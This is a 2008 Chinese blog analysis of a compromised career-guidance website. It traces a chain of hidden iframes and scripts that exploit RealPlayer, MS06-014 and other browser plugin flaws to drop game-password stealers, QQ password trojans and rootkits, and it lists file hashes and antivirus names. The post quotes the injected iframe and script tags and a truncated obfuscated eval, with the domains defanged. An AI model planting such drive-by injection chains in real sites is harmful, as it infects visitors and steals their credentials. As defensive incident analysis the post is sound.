某职业指导网被挂Trojan.Win32.KillAV,Trojan.PSW.Win32.QQPass,RootKit.Win32.Mnless等

某职业指导网被挂Trojan.Win32.KillAV,Trojan.PSW.Win32.QQPass,RootKit.Win32.Mnless等

endurer 原创
2008-04-03 第1

网站页面包含代码:
/---
<iframe src="hxxp://www.t**-t**o*u*.cn/ping.html" width="0" height="0" frameborder="0"></iframe>
---/

#1 hxxp://www.t**-t**o*u*.cn/ping.html 包含代码:
/---
<iframe src=hxxp://**a.1**5*8d*m**.com/b3.htm?001 width=0 height=0></iframe>
---/

#1.1 hxxp://**a.1**5*8d*m**.com/b3.htm?001 包含代码:
/---
<script language=javascript src=hxxp://*b*.1**5*8d*m**.com/one/ok.js></script>
<iframe src=hxxp://*b*.1**5*8d*m**.com/one/ok.htm width=1 height=1 border=1></iframe>
---/

#1.1.1 hxxp://*b*.1**5*8d*m**.com/one/ok.js

利用RealPlayer的rmoc3260.dll(clsid:2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93)漏洞 下载 hxxp://*c**.1**5*8d*m**.com/ok.exe


文件说明符 : D:/test/ok.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 13:5:52
修改时间 : 2008-4-2 13:5:52
访问时间 : 2008-4-2 13:6:53
大小 : 17552 字节 17.144 KB
MD5 : 5cdc70021acab5e000c4dfff29cd451c
SHA1: 578DFDEBF168E049A3AB802C832636488A2F0456
CRC32: 4b9edaef


Kaspersky 报为 Trojan.Win32.KillAV.qe,瑞星 报为 Trojan.Win32.Undef.efz

ok.exe会利用映像劫持/IFEO,ShellExecuteHook等技术阻止杀毒软件启动,并下载hxxp://*c**.1**5*8d*m**.com/ok.txt 中指定的文件。

文件说明符 : D:/test/ao.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:26:6
修改时间 : 2008-4-2 14:26:7
访问时间 : 2008-4-2 14:26:30
大小 : 78686 字节 76.862 KB
MD5 : 89f3ee2e22bbd8b266a293f5166fc17a
SHA1: 281693777E23DABF78D8008762B37AFE40DA7A55
CRC32: d398c5b0

Kaspersky 报为 Trojan.Win32.Agent.jfx [KLAB-4526233]


文件说明符 : D:/test/a1.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:26:7
修改时间 : 2008-4-2 14:26:8
访问时间 : 2008-4-2 14:26:30
大小 : 22776 字节 22.248 KB
MD5 : 24b7771b9e1afb8b449465515682a17a
SHA1: C10E5F88214D5D59DC2513D531973C28EBAB0434
CRC32: a9249d9a

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.yog,瑞星 报为 Trojan.PSW.Win32.GameOL.mjf

文件说明符 : D:/test/a2.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:0
修改时间 : 2008-4-2 14:28:1
访问时间 : 2008-4-2 14:37:1
大小 : 21079 字节 20.599 KB
MD5 : 702b5959df5bd296f76597fa64143831
SHA1: 34EC9F5CBB7E68B83D02780725368701767E1CF7
CRC32: 7f3dfe3b

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.ymj,瑞星 报为 Trojan.PSW.Win32.GameOL.GEN

文件说明符 : D:/test/a3.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:1
修改时间 : 2008-4-2 14:28:1
访问时间 : 2008-4-2 14:47:26
大小 : 20468 字节 19.1012 KB
MD5 : 8a7f7d39b47919e7090396df5b24ac4d
SHA1: F0F0CB79C124F768252FFEF92AC8A5EB91D9D079
CRC32: cbca1fad

瑞星 报为 Trojan.PSW.Win32.GameOL.GEN

文件说明符 : D:/test/a4.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:1
修改时间 : 2008-4-2 14:28:2
访问时间 : 2008-4-2 14:37:1
大小 : 19632 字节 19.176 KB
MD5 : 642aa45bd05212683008e2798f9cb2f8
SHA1: 422EC027BDDF7C5BD8A535B4DC7AA2CC386DEFB1
CRC32: ff9d839b

瑞星 报为 Trojan.PSW.Win32.GameOL.mta

文件说明符 : D:/test/a5.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:2
修改时间 : 2008-4-2 14:28:2
访问时间 : 2008-4-2 14:37:1
大小 : 14972 字节 14.636 KB
MD5 : b893b68b3ebd8f5e2c0f07c3de4e55f9
SHA1: 439597AFF3785FAB138B00DE716F202CF8FC0D69
CRC32: 97dd3497

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.yog,瑞星 报为 Trojan.PSW.Win32.GameOL.mjf

文件说明符 : D:/test/a6.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:2
修改时间 : 2008-4-2 14:28:2
访问时间 : 2008-4-2 14:37:1
大小 : 19924 字节 19.468 KB
MD5 : 913ccd2b2828423a0929a706f199908e
SHA1: 4B0E66B96A5DB16A8C358447BC6688A47178FE13
CRC32: 4dfa63f5

瑞星 报为 RootKit.Win32.Mnless.la

文件说明符 : D:/test/a7.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:2
修改时间 : 2008-4-2 14:28:3
访问时间 : 2008-4-2 14:37:1
大小 : 14568 字节 14.232 KB
MD5 : 4f781b24439d8c74803735820a51cb36
SHA1: 2A410FDD247D187DFB7EE71E675657C8B121C229
CRC32: 0ccc1ae2

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.yog,瑞星 报为 Trojan.PSW.Win32.GameOL.mjf

文件说明符 : D:/test/a8.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:3
修改时间 : 2008-4-2 14:28:3
访问时间 : 2008-4-2 14:37:1
大小 : 19939 字节 19.483 KB
MD5 : 3be779060716d94062c0d7dd870b730a
SHA1: 08145BC24B2A4853B37EB89D56C573F09853174D
CRC32: 93a08250

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.wjm,瑞星 报为 Trojan.PSW.Win32.GameOL.GEN

文件说明符 : D:/test/a9.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:3
修改时间 : 2008-4-2 14:28:3
访问时间 : 2008-4-2 14:37:1
大小 : 17908 字节 17.500 KB
MD5 : 4a9c60c56a45513871e66a1eb3a7c567
SHA1: BD85C7495E9FA41595BC623ED5B2F8DF92DC2DF2
CRC32: f1fe083d

Kaspersky 报为 Trojan-Downloader.Win32.Zlob.geg,瑞星 报为 Trojan.PSW.Win32.GameOL.mjf

文件说明符 : D:/test/a10.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:3
修改时间 : 2008-4-2 14:28:4
访问时间 : 2008-4-2 14:37:1
大小 : 19363 字节 18.931 KB
MD5 : ce5c37b3e404229d91fb5cb64c5e0889
SHA1: F433A2D216A1BA9DFB3AC960F8B22D12F334B5EF
CRC32: a8565a23

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.vlp,瑞星 报为 Trojan.PSW.Win32.GameOL.GEN


文件说明符 : D:/test/a11.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:4
修改时间 : 2008-4-2 14:28:4
访问时间 : 2008-4-2 14:37:1
大小 : 19724 字节 19.268 KB
MD5 : b3ac229ffcac4f802f9cbb01bb02087a
SHA1: CA9E7476ACD9EA1EA4732C5D231501BF056F2C18
CRC32: 856092b1

瑞星 报为 Trojan.PSW.Win32.GameOL.GEN

文件说明符 : D:/test/a12.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:4
修改时间 : 2008-4-2 14:28:4
访问时间 : 2008-4-2 14:37:1
大小 : 19756 字节 19.300 KB
MD5 : 7975719e767a35e55554294247838238
SHA1: D148AEF2BFE2BBC49B1FDCC9A71E179B6B086F7C
CRC32: c17a2595

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.usl,瑞星 报为 Trojan.PSW.Win32.GameOL.mnp

a13.exe 未能下载

文件说明符 : D:/test/a14.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:5
修改时间 : 2008-4-2 14:28:5
访问时间 : 2008-4-2 14:37:1
大小 : 19278 字节 18.846 KB
MD5 : dca0c58d2158eb2fdfcbf373bbe36e19
SHA1: 587981C29A8B5FBDD53A1C68340A89080A4564DC
CRC32: 44f05cc4

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.uff,瑞星 报为 Trojan.PSW.Win32.GameOL.GEN

文件说明符 : D:/test/a15.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:6
修改时间 : 2008-4-2 14:28:6
访问时间 : 2008-4-2 14:37:1
大小 : 19711 字节 19.255 KB
MD5 : 23bd8fd302d6ddb0857f5f6cb0c3ce67
SHA1: A5A21C15CCC4BB7A5E0BE5C4802C28E69486F0CC
CRC32: 417d25e9

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.wpa,瑞星 报为 Trojan.PSW.Win32.GameOL.GEN

文件说明符 : D:/test/a16.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:6
修改时间 : 2008-4-2 14:28:6
访问时间 : 2008-4-2 14:37:1
大小 : 19207 字节 18.775 KB
MD5 : 69e5f34e26384573f64218a2b128953f
SHA1: CDC3CD20C7C8E555358328F1DBEC97715AE550C4
CRC32: cbfcbe1b

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.ucj,瑞星 报为 Trojan.PSW.Win32.GameOL.GEN


文件说明符 : D:/test/a17.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:8
修改时间 : 2008-4-2 14:28:8
访问时间 : 2008-4-2 14:37:1
大小 : 17344 字节 16.960 KB
MD5 : 08f21d970af5864e8c5808c147da9aea
SHA1: 51D128C9689363913FCBBB0A909EE2F196688DD1
CRC32: 5a962297

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.yut,瑞星 报为 RootKit.Win32.Mnless.la

文件说明符 : D:/test/a18.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:8
修改时间 : 2008-4-2 14:28:8
访问时间 : 2008-4-2 14:37:1
大小 : 14376 字节 14.40 KB
MD5 : dbca31c57a6f14db776b1ff862ecc30a
SHA1: D85B565670C980BA6CA73F8C2FD1BA9B5C1CD8E7
CRC32: bfffb79a

瑞星 报为 Trojan.PSW.Win32.GameOL.mjf

文件说明符 : D:/test/a19.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:9
修改时间 : 2008-4-2 14:28:9
访问时间 : 2008-4-2 14:37:1
大小 : 33419 字节 32.651 KB
MD5 : 7542020c6141918e8f0c8058c456e66a
SHA1: 3CA9CED11CF1CA869E9DBDFE60AF9CF1422C294C
CRC32: bea7fc10

Kaspersky 报为 Trojan-PSW.Win32.QQPass.bmd,瑞星 报为 Trojan.PSW.Win32.QQPass.zfa


文件说明符 : D:/test/a20.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:9
修改时间 : 2008-4-2 14:28:9
访问时间 : 2008-4-2 14:37:1
大小 : 16963 字节 16.579 KB
MD5 : 02de1cd1ddacc63a71c30e5bdcc4ad4d
SHA1: 9B32A3DB1D6F63CFFCFD768FF2B1128D7D98110A
CRC32: 63a5d8f6

瑞星 报为 Trojan.PSW.Win32.GameOL.GEN


文件说明符 : D:/test/a21.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:9
修改时间 : 2008-4-2 14:28:9
访问时间 : 2008-4-2 14:37:1
大小 : 14624 字节 14.288 KB
MD5 : d3fada2b4c9a447e57838076bf1540c5
SHA1: 6663EE2437770CBA7222CB111B88A6E250AF00B4
CRC32: 8e5984ee

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.whs,瑞星 报为 Trojan.PSW.Win32.GameOL.mjf

文件说明符 : D:/test/a22.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:10
修改时间 : 2008-4-2 14:28:10
访问时间 : 2008-4-2 14:37:1
大小 : 14116 字节 13.804 KB
MD5 : d50a1deabba26f48a1ebcf101ffc68a9
SHA1: C39A8562463B1A5A74EDC7AC0F1C5D954A6F666A
CRC32: 159e2390

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.whs,瑞星 报为 Trojan.PSW.Win32.GameOL.mjf


文件说明符 : D:/test/a23.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:10
修改时间 : 2008-4-2 14:28:10
访问时间 : 2008-4-2 14:37:1
大小 : 20264 字节 19.808 KB
MD5 : a1cdc81a8061fc0c0ebc4c7d4d764126
SHA1: B1656DBB1C6D1AF14694C5925D5B8CB454EF6B22
CRC32: 526c5bdc

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.wfb,瑞星 报为 Trojan.PSW.Win32.GameOL.GEN

文件说明符 : D:/test/a24.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:10
修改时间 : 2008-4-2 14:28:10
访问时间 : 2008-4-2 14:37:1
大小 : 14784 字节 14.448 KB
MD5 : 6f347bca0e1629a4cf0b5eec89b5f7ac
SHA1: 2F8D1C40B520BBC14BC210E7B40F6BB2CF7CE203
CRC32: 7b352eae

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.whs,瑞星 报为 Trojan.PSW.Win32.GameOL.mjf

文件说明符 : D:/test/a25.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:10
修改时间 : 2008-4-2 14:28:10
访问时间 : 2008-4-2 14:37:1
大小 : 13972 字节 13.660 KB
MD5 : 21bb9e1eba6588de8595a2309a81d19d
SHA1: BAED94795612EC633F0D45303DE5FE710682B6F1
CRC32: 7a169f5f

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.whs,瑞星 报为 Trojan.PSW.Win32.GameOL.mss

文件说明符 : D:/test/a26.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:11
修改时间 : 2008-4-2 14:28:11
访问时间 : 2008-4-2 14:37:1
大小 : 29613 字节 28.941 KB
MD5 : d2a5792a249763d45e10fababfb624f9
SHA1: 6A01C4B11F587325C5A6E68849CD4D9D711E208E
CRC32: 7119f971

Kaspersky 报为 Trojan-PSW.Win32.Lmir.bpv,瑞星 报为 Trojan.PSW.Win32.GamesOnline.fz

a27.exe 未能下载

文件说明符 : D:/test/a28.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:11
修改时间 : 2008-4-2 14:28:12
访问时间 : 2008-4-2 14:37:1
大小 : 14856 字节 14.520 KB
MD5 : 1370394482e46fc35eceb6dda7728cc6
SHA1: FA0151AF6685ADBF4D5A87CE685F63615206DE4D
CRC32: 60ff2aa7

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.whs,瑞星 报为 Trojan.PSW.Win32.GameOL.mjf

文件说明符 : D:/test/a29.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:12
修改时间 : 2008-4-2 14:28:12
访问时间 : 2008-4-2 14:37:1
大小 : 17318 字节 16.934 KB
MD5 : d00d9aab855309712a6ef4fc8730951b
SHA1: 87671C6ED6E13B68B8810CA48646EE333CDE946B
CRC32: 41189142

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.xjn,瑞星 报为 Trojan.PSW.Win32.GameOL.GEN

文件说明符 : D:/test/a30.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:12
修改时间 : 2008-4-2 14:28:13
访问时间 : 2008-4-2 14:37:1
大小 : 17188 字节 16.804 KB
MD5 : f10a6e968e72080f02eb60c4146ddbbd
SHA1: E2525B7F75E8F4860FF3BB09CED7292C111CC3C1
CRC32: 66ec0f6c

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.ymv,瑞星 报为 Trojan.PSW.Win32.GameOL.GEN

文件说明符 : D:/test/a31.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:13
修改时间 : 2008-4-2 14:28:13
访问时间 : 2008-4-2 14:37:1
大小 : 15132 字节 14.796 KB
MD5 : c9e920a1a62a58f1ce99d7ef31d9bd0c
SHA1: 3B0F42E272FA99386B04401C82796202D8B14D36
CRC32: de7a9b7a

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.whs,瑞星 报为 Trojan.PSW.Win32.GameOL.mjf

a32.exe 未能下载

文件说明符 : D:/test/a33.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:13
修改时间 : 2008-4-2 14:28:14
访问时间 : 2008-4-2 14:37:1
大小 : 20128 字节 19.672 KB
MD5 : c5e2c08165f17d949b1bac0523f63444
SHA1: A827F6C90937DF75B8B33D9DB5599C2AAE0969B7
CRC32: 5834455e

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.yuu,瑞星 报为 Trojan.PSW.Win32.XYOnline.acg

文件说明符 : D:/test/a34.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:14
修改时间 : 2008-4-2 14:28:14
访问时间 : 2008-4-2 14:37:1
大小 : 17440 字节 17.32 KB
MD5 : f1dcb41a1edea089aeba5a15a4b9286f
SHA1: 58FD2A0A8581DBA2AFB290271ACAF9D94BCC2F3A
CRC32: ee164f46

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.ysl,瑞星 报为 RootKit.Win32.Mnless.la

文件说明符 : D:/test/avp.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:15
修改时间 : 2008-4-2 14:28:15
访问时间 : 2008-4-2 14:37:1
大小 : 43136 字节 42.128 KB
MD5 : 1276b927abdf9f15a76141e86f473774
SHA1: E198B37EE0FE40478785B22C550974F1E709A71F
CRC32: 932eb6b8

Kaspersky 报为 Trojan-PSW.Win32.OnLineGames.uvg,瑞星 报为 Trojan.Win32.Undef.efx

文件说明符 : D:/test/oko.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2008-4-2 14:28:14
修改时间 : 2008-4-2 14:28:14
访问时间 : 2008-4-2 14:37:1
大小 : 1024 字节 1.0 KB
MD5 : f2bf82138d664f6826be8fc485436761
SHA1: 92AF88ACED0D804237464904541024C25236726B
CRC32: e1352b66

瑞星 报为 Trojan.Win32.Undef.efx


#1.1.2 hxxp://*b*.1**5*8d*m**.com/one/ok.htm包含代码:
/---
<SCRIPT LANGUAGE="JavaScript">
eval("/151/146/50/144/157/143/165"+"/155/…(略)…/12/175")
</SCRIPT>
---/
检测cookie变量 OK,输出代码:
/---
<script src=hxxp://*b*.1**5*8d*m**.com/one/14.js></script>
<script src=hxxp://*b*.1**5*8d*m**.com/one/rl.js></script>
<script src=hxxp://*b*.1**5*8d*m**.com/one/lz.js></script>
---/


#1.1.2.1 hxxp://*b*.1**5*8d*m**.com/one/14.js
利用 MS06-014漏洞下载 hxxp://*c**.1**5*8d*m**.com/ok.exe


#1.1.2.2 hxxp://*b*.1**5*8d*m**.com/one/rl.js

利用 RealPlayer(IERPCtl.IERPCtl.1)漏洞 下载 hxxp://*c**.1**5*8d*m**.com/ok.exe

#1.1.2.3 hxxp://*b*.1**5*8d*m**.com/one/lz.js

利用 联众软件(clsid:61F5C358-60FB-4A23-A312-D2B556620F20)漏洞 下载 hxxp://*c**.1**5*8d*m**.com/ok.exe

#1.1.2.4 利用 BaiduBar.Tool 下载 hxxp://*c**.1**5*8d*m**.com/Baidu.cab,内含 new.exe

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值